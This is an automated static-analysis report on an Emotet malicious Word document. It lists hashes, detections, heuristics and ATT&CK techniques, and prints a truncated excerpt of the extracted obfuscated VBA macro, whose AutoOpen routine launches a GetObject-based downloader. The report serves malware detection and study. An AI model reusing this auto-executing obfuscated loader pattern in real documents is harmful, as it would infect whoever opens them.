Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 9a8d362fc959cf40…

MALICIOUS

Office (OLE)

176.6 KB Created: 2019-03-29 11:51:00 Authoring application: Microsoft Office Word First seen: 2019-06-27
MD5: b982539a10e2bb1ca7f2aa9729376ab4 SHA-1: 1076ab5103d747b6a61586c0c7b0660d7f71b71f SHA-256: 9a8d362fc959cf40b56da65e72e1dd1a8a891fe93215a2f97fc8b4c51fc62ec1
222 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV with the signature Doc.Downloader.Emotet-6916021-0. Static analysis revealed the presence of VBA macros, including an AutoOpen macro that utilizes GetObject, indicating an attempt to execute malicious code. The obfuscated VBA script likely functions as a downloader for a second-stage payload, consistent with Emotet's typical behavior.

Heuristics 7

  • ClamAV: Doc.Downloader.Emotet-6916021-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6916021-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 24415 bytes
SHA-256: b087b35146312bd57391438db15bf37e0bd0ff842e6287c48ce8c4a880452b6c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "QAXAUAQB"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "acU_wXDB"
Attribute VB_Base = "0{4FCED8B7-30FC-4ED9-A1E7-1F401687FD9E}{78F889BA-9E36-47E5-A472-6210A96358E2}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "FAGXUAQA"
Attribute VB_Base = "0{3DE04CE5-B0B0-4846-9C33-5EE74FC586C2}{858E5775-70DD-4A6D-B2E8-2266E10C1C0B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "YZQAAD"
Function noAQcUCw()
   If UAoDAXQX = vADA4c Then
Set wADwD4Zo = iAZAAoXZ
oXABxAC = tAGAAD4 - 505055942 - 168268245 + Log(680083444 - Atn(zABQcUAZ / FQAAQZZw + jAAQcDA / Tan(178843477))) * (722570223 + Sgn(375321897 / Sin(vAAAD1xC)))
Set wCAAXA = zCCAAQ
End If
   If qZccBA = VBAQXA_k Then
Set r4DUxDw = fDUxAABC
kAUAwD = PwxA4A - 718307864 - 952430164 + Log(455767000 - Atn(ZAAkXk / cAQ4UXcU + XBAQCAw / Tan(924078672))) * (298640277 + Sgn(738034148 / Sin(sQQBQw)))
Set KAQGCX = RkAAAQc
End If
End Function
Function zAAAAUAw()
   If hAGUUQA = MAXUAwDx Then
Set wQUAoxGZ = JGUQBA
wAw4AA = FZAQAUAB - 284219250 - 817125947 + Log(257052538 - Atn(kU1AwBBA / PQAAAG + YowAX_ / Tan(246632403))) * (840841142 + Sgn(793654468 / Sin(YADXAAQC)))
Set RAwGDAc = fAAQQ4B
End If
   If Q1BUACA = H4oDBX Then
Set uX4BoDA = jCwC1xUQ
rAZBAAA = jAD_AcAo - 555087613 - 23826184 + Log(431821409 - Atn(QA1AAAB / pAU_wUA + jxA_AQ_ / Tan(973340830))) * (953480254 + Sgn(478078400 / Sin(bAZ1xQ1k)))
Set YAADQAQQ = tZACkB
End If
   If j4ADACQA = RA1XAAB Then
Set EkZwA4 = LAAA_C
WQDDDAA = rDxDAAQ - 571512356 - 510268391 + Log(206464688 - Atn(VAAUUB / WocxB4 + OAD_AAc / Tan(256286743))) * (29559814 + Sgn(848300119 / Sin(v_CAUZx1)))
Set SXAACCD = WQA1ABkG
End If
End Function
Sub autoopen()
m1CQQA
End Sub
Function m1CQQA()
On Error Resume Next
   If KA4GwZAx = rAXk_AAo Then
Set j41CGC = J4BZX_
MBBQoBZc = vcCAAUB - 368973020 - 110878762 + Log(596488084 - Atn(z1AAB_w / kAGDC1G + G1BXxo / Tan(251480417))) * (522235078 + Sgn(862993557 / Sin(qDAABo1A)))
Set BAAoXXAB = sAA_AA
End If
   If FXDQCAx = zAxcX4cA Then
Set NCQGAUcQ = sAD44AA
nAABADAG = dUQAcX - 470963566 - 560500095 + Log(512986172 - Atn(zQAUCk / TAQcUDU + KABUBA / Tan(27841163))) * (919408799 + Sgn(99276263 / Sin(VkUQQQ)))
Set f_UwGAA = mAwAcD
End If
Set d1wDDA = GetObject(acU_wXDB.UGD1AkUA.Text + FAGXUAQA.VcCAA_AA + acU_wXDB.UGD1AkUA.ControlTipText)
   If lAkAAkBk = q_1_4Z Then
Set NGAZwD = MAABBD
VAkAAAB = IxAAA4AA - 712660577 - 448959432 + Log(325920443 - Atn(Ax4woU / fAwAA1 + Y4BU4DD / Tan(424755303))) * (775049975 + Sgn(433238418 / Sin(OBAAAX)))
Set rZAAAU = wBA1UA
End If
   If wcxZU1 = mBZBAQ4 Then
Set UUAQAX4 = tcAQADAA
iDAGQAD = IUQZ1A - 985433666 - 974070461 + Log(272105171 - Atn(qADAUA / cUADDwCB + aDAZ4A / Tan(592446402))) * (361723672 + Sgn(462940403 / Sin(CkQUZQA)))
Set OCDUA4k = OABUCQX
End If
If 44628 = 44628 Then
   If j4AGGA = EA_BAxXA Then
Set AAxwAAw = ZA4AAADA
GBUwAA = SADAGDA - 536367155 - 787462622 + Log(197038824 - Atn(q_AAAGZX / pCkDoQ4C + cooAUA / Tan(595061147))) * (498456042 + Sgn(721229599 / Sin(IGkAGA)))
Set DBAAQ4 = dXAABAA
End If
   If jUAGAQx = HAAcw4x Then
Set cZADA4AD = j_DQAC
BxAZoo_A = IGAkDA_B - 261462350 - 616511046 + Log(655718205 - Atn(IxQBAQBB / fxckx4 + FAwAk_Z / Tan(363086683))) * (25956024 + Sgn(321724842 / Sin(PA_AAZD1)))
Set PDkAAkkw = sxBBQAoA
End If
   If CQAZCx = moxkDBx_ Then
Set sDxAAAAX = ZQZAXAww
iU4cUoC = cAGQCA - 845238247 - 325819389 + Log(703240359 - Atn(DAUAAcU / fAAokk__ + JDwkAQA / Tan(223797623))) * (5233956
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.